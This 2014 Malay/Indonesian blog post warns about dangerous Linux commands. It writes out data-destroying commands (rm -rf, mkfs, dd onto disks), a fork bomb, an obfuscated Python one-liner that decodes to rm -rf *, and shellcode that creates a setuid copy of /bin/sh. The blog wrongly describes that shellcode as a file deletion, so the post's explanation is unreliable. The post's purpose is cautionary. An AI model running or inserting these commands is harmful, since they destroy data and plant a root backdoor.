Sunday, 13 April 2014
7 PERINTAH-PERINTAH BERBAHAYA DI LINUX
Assalamualaikum.. & Salam Sejahatera
Terdapat banyak artikel yang membahas “7 perintah berbahaya di linux”, sebenarnya ada lebih dari 7. Dan yang berbahaya sebenarnya bukanlah perintahnya melainkan kelalaian user ketika menggunakan akses sebagai root, jadi sesungguhnya anda terbebas dari bahaya ini jika ketika anda menjadi root, anda berhati-hati.
Berikut adalah yang Encikdapat dari ubuntuguide, gunakan sebagai pelajaran dan bukan untuk kejahatan.
1. Mengahapus semua yang ada di derektori
rm -rf /
rm -rf .
rm -rf *
rm -rf / mungkin tidak akan berhasil jika anda tidak memiliki akses root seperti memakai sudo, namun rm -rf . dan rm -rf * dapat menghapus apa saja di direktori dengan akses user biasa, jadi hati-hati.
2. Reformat data di device
mkfs.ext3 /dev/sda2
mkfs.apasaja /dev/sda3
Kemungkinan tak akan berhasil tanpa akses root, dan kalau pun berhasil data masih bisa dikembalikan
3. Manipulasi block device
perintah_apa_saja > /dev/sda
dd if=apalah of=/dev/sda
Mengerikan, Encikbelum pernah cuba ini tapi terlihat jika anda mencuba salah satunya maka block awal device (atau harddisk) akan menjadi raw atau format yang tidak dketahui.
4. ForkBomb
:(){:|:&};: di bash
fork while fork di perl
Encik tidak paham ini tapi ubuntuguide mengatakan perintah-perintah itu akan menyebabkan sistem menjadi hang.
5. Tarbomb
Menarik dunia linux, ternyata file tar archive oleh seseorang dapat digunakan untuk menginjeksi file-file ke dalam sistem atau dengan cara lain dapat menduplikat jutaan file. Pencegahannya, jika anda diminta untuk mengekstrak tar di derektori tertentu maka anda harus berhati-hati, ekstrak di direktori yang bersih, setelah yakin aman baru pindahkan pada direktori yang diminta.
6. Bom Decompression
File archive yang terlihat kecil namun saat didekompresi menjadi berukuran GB
7. Mengeksekusi script yang tidak jelas sumbernya
Banyak yang beranggapan Linux itu tahan atau anti virus, ini keliru karena tidak ada OS yang tahan virus dan bug. Linux jarang terkena virus karena penggunanya selalu mengeksekusi script dari sumber yang diketahui seperti dari repository distronya atau dari situs dipercaya seperti launchpad, sourforge misalnya. Contoh berikut adalah script python
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
dimana “sn!.sg!+” serupa dengan perintah rm -rf *. Jika dilihat script itu, bahkan yang mahir dengan python pun belum tentu menyadari bahayanya.
Contoh lain (Encik belum pernah cuba yang ini dan belum tahu cara menggunakannya):
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
ubuntuguide mengatakan ini sama dengan rm -rf ~ / &.
#Sekian Terima Kasih
#Encik Ubuntu (Linux User)
Subscribe to:
Post Comments (Atom)
No comments:
Write comments